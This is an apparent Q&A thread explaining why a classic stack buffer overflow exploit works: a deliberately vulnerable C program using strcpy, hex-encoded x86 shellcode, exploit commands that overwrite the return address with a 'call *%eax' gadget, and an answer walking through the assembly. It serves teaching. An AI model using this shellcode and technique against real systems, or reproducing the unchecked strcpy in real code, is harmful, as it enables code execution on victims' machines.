Explaining a buffer overflow vulnerability in C

Question

Given this C program:

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
  char buf[1024];
  strcpy(buf, argv[1]);
}

Built with:

gcc -m32 -z execstack prog.c -o prog

Given shell code:

EGG=$(printf '\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/df')

The program is exploitable with the commands:

./prog $EGG$(python -c 'print "A" * 991 + "\x87\x83\x04\x08"')
./prog $EGG$(python -c 'print "A" * 991 + "\x0f\x84\x04\x08"')

where I got the addresses from:

$ objdump -d prog | grep call.*eax
 8048387:   ff d0                   call   *%eax
 804840f:   ff d0                   call   *%eax

I understand the meaning of the AAAA paddings in the middle, I calculated the 991 based on the length of buf in the program and the length of $EGG.

What I don't understand is why any of these addresses with call *%eax trigger the execution of the shellcode copied to the beginning of buf. As far as I understand, I'm overwriting the return address with 0x8048387 (or the other one), what I don't understand is why this leads to jumping to the shellcode.

I got this far by reading Smashing the stack for fun and profit. But the article uses a different approach of guessing a relative address to jump to the shellcode. I'm puzzled by why this more simple, alternative solution works, straight without guesswork.

Keep in mind that you cannot say that your exploit **works**, as the reported behavior took place because of a programming error. You left the address returned by strcpy() *hanging in the vacuum* and that cannot be described as something a developer would do in his software. Copying a memory buffer to another address (*that gets lost!*) makes no sense if you don't use this new address for anything. — DarkLighting, Dec 29 '14 at 13:16

score 11 · Accepted Answer · answered Sep 28 '13 at 22:36

On 32-bit x86 processors, with the ELF format in use on Linux systems, the function call convention states (page 3-12) that:

A function that returns an integral or pointer value places its result in register %eax.

In your program, the last element of main() is a call to strcpy(). That function returns a copy of its first argument, here a pointer to the buf[] array. So, when the end of main() is reached, %eax still points to the buf[] array, so that's where the call *%eax will jump: into the array which contains the shellcode.

If unsure, see the generated assembly code:

$ gcc -m32 -z execstack -fno-stack-protector prog.s
$ cat prog.s
    .file   "prog.c"
    .text
    .globl  main
    .type   main, @function
main:
.LFB0:
    .cfi_startproc
    pushl   %ebp
    .cfi_def_cfa_offset 8
    .cfi_offset 5, -8
    movl    %esp, %ebp
    .cfi_def_cfa_register 5
    andl    $-16, %esp
    subl    $1040, %esp
    movl    12(%ebp), %eax
    addl    $4, %eax
    movl    (%eax), %eax
    movl    %eax, 4(%esp)
    leal    16(%esp), %eax
    movl    %eax, (%esp)
    call    strcpy
    leave
    .cfi_restore 5
    .cfi_def_cfa 4, 4
    ret
    .cfi_endproc
.LFE0:
    .size   main, .-main
    .ident  "GCC: (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3"
    .section    .note.GNU-stack,"",@progbits

See at the end ? After the call strcpy, there is only a leave, then a ret, neither of which modifying %eax. So when the ret is reached, %eax still contains the value which was set by the strcpy() function, and that's a pointer to the buf[] array.

If you add a return 0; after the call to strcpy(), then the exploit no longer works, because that return 0; will set %eax to 0 before returning; and the call *%eax will jump to address 0, triggering a segmentation fault. In the assembly code generated by GCC, you would see an extra movl $0, %eax before the leave.

Explaining a buffer overflow vulnerability in C

1 Answers1